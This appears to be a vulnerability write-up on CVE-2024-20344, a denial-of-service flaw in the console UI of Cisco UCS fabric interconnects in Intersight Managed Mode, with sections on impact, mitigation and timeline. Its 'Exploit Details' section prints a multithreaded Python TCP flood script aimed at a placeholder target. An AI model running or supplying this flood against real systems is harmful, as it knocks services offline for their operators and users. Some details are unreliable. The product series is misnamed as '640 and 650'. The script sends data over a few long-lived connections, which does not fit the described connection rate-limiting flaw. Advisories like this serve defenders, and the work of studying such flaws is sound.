CVE-2024-20344: Remote Denial of Service Vulnerability in Cisco UCS 640 and 650 Series Fabric Interconnects with Intersight Managed Mode

A critical vulnerability has been identified in the Cisco UCS 640 and 650 Series Fabric Interconnects that are operating in Intersight Managed Mode (IMM). This vulnerability, designated as CVE-2024-20344, could potentially allow an unauthenticated, remote attacker to cause a Denial of Service (DoS) condition on the Device Console User Interface of the affected devices.

The Vulnerability: Insufficient Rate-Limiting of TCP Connections
This specific vulnerability arises from insufficient rate-limiting of TCP connections to affected devices. As a result, an attacker has the potential to exploit this vulnerability by sending a large number of TCP packets to the Device Console UI.

Exploit Details

If a remote attacker successfully exploits this vulnerability, they would be able to cause the Device Console UI process to crash, resulting in a DoS condition. To restore complete functionality, a manual reload of the fabric interconnect would be required.

The following code snippet demonstrates how an attacker could potentially send a high number of TCP packets to the Device Console UI:

import socket
import threading

# Target IP and Port
target_ip = "TARGET_IP_ADDRESS"
target_port = 80

def send_packets():
    try:
        # Create a socket connection
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))

        while True:
            # Send a large number of TCP packets
            sock.send(b"attacker_packet")
    except:
        pass

# Create multiple threads to send packets simultaneously
for _ in range(100):
    t = threading.Thread(target=send_packets)
    t.start()

Original References

For further information and details on this vulnerability, readers can refer to the following resources:
1. Cisco Advisory
2. CVE-2024-20344

Device Affected

The devices affected by this vulnerability are Cisco UCS 640 and 650 Series Fabric Interconnects that are in Intersight Managed Mode (IMM).

Mitigation and Resolution

Cisco has released updates to address this vulnerability in their affected products, and users are urged to apply these updates as soon as possible. Additionally, following network security best practices, such as limiting the rate of incoming connections and implementing proper access control, can help mitigate the risk of exploitation.

In conclusion, it is crucial for organizations using Cisco UCS 640 and 650 Series Fabric Interconnects in Intersight Managed Mode (IMM) to be aware of CVE-2024-20344 and take necessary action to safeguard their systems. By staying informed, taking the recommended steps for mitigation, and applying the appropriate updates, organizations can protect themselves from potential harm caused by this vulnerability.

Timeline

Published on: 02/29/2024 01:43:59 UTC
Last modified on: 02/29/2024 13:49:29 UTC